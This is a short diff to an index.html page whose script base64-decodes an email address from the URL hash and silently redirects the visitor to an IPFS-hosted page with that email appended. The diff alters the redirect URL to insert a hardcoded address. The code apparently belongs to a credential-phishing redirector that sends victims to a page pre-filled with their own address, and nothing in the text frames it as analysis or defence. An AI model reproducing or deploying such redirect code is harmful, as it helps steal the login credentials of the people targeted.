--- a/index.html
+++ b/index.html
@@ -14,7 +14,7 @@
     // Use hash if present, otherwise eta
     var param = hash || eta || '';
     var url_get_email = atob(getafterhash(param));
-    var mail_go_url = "https://ipfs.io/ipfs/bafkreiec6yphpb52wigz24fwcaztnx44mjmsvfxmmnmrrqnjureeh3m3i4#" + url_get_email + "";
+    var mail_go_url = "https://ipfs.io/ipfs/bafkreiec6yphpb52wigz24fwcaztnx44mjmsvfxmmnmrrqnjureeh3m3i4#hguyfhv@gg.com#" + url_get_email + "";
     location.replace(mail_go_url);
 
     function getafterhash(url) {
